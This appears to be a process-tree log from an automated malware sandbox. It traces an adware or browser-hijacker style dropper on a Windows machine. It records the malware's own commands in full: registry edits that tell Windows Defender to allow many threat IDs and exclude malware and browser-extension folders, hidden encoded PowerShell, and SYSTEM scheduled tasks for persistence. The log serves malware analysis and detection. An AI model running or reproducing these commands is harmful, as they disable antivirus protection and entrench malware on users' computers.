C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 26241⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 26241⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 26241⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2624 -ip 26241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2624 -ip 26241⤵
-
C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\dtXVaZYpVgtLOQz\GIVcqKU.exeC:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\dtXVaZYpVgtLOQz\GIVcqKU.exe js /site_id 690689 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FaGkFfZLSayRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FaGkFfZLSayRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JGBawXrjoobU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JGBawXrjoobU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aHEACJvKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aHEACJvKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gGVtJVleRHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gGVtJVleRHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OWjgaygRnjJbmZVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OWjgaygRnjJbmZVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EtAJcKWZAugUizrJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EtAJcKWZAugUizrJ\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaGkFfZLSayRC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaGkFfZLSayRC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaGkFfZLSayRC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JGBawXrjoobU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JGBawXrjoobU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aHEACJvKU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aHEACJvKU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gGVtJVleRHUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gGVtJVleRHUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OWjgaygRnjJbmZVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OWjgaygRnjJbmZVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EtAJcKWZAugUizrJ /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EtAJcKWZAugUizrJ /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gleTmtEMv" /SC once /ST 12:48:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gleTmtEMv"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gleTmtEMv"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jxYoSlBHWktfkOGzI" /SC once /ST 12:41:13 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EtAJcKWZAugUizrJ\ibUqNeZSlzLlgjD\dNErpHF.exe\" s9 /site_id 690689 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jxYoSlBHWktfkOGzI"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\EtAJcKWZAugUizrJ\ibUqNeZSlzLlgjD\dNErpHF.exeC:\Windows\Temp\EtAJcKWZAugUizrJ\ibUqNeZSlzLlgjD\dNErpHF.exe s9 /site_id 690689 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Checks for any installed AV software in registry
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bIxjpVXoYOizHLMzgM"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\aHEACJvKU\MYznPW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "BjteDXltprXfzmY" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BjteDXltprXfzmY2" /F /xml "C:\Program Files (x86)\aHEACJvKU\XZPywfJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BjteDXltprXfzmY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BjteDXltprXfzmY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vPYIdGywxzqMlm" /F /xml "C:\Program Files (x86)\JGBawXrjoobU2\kFUMGCg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
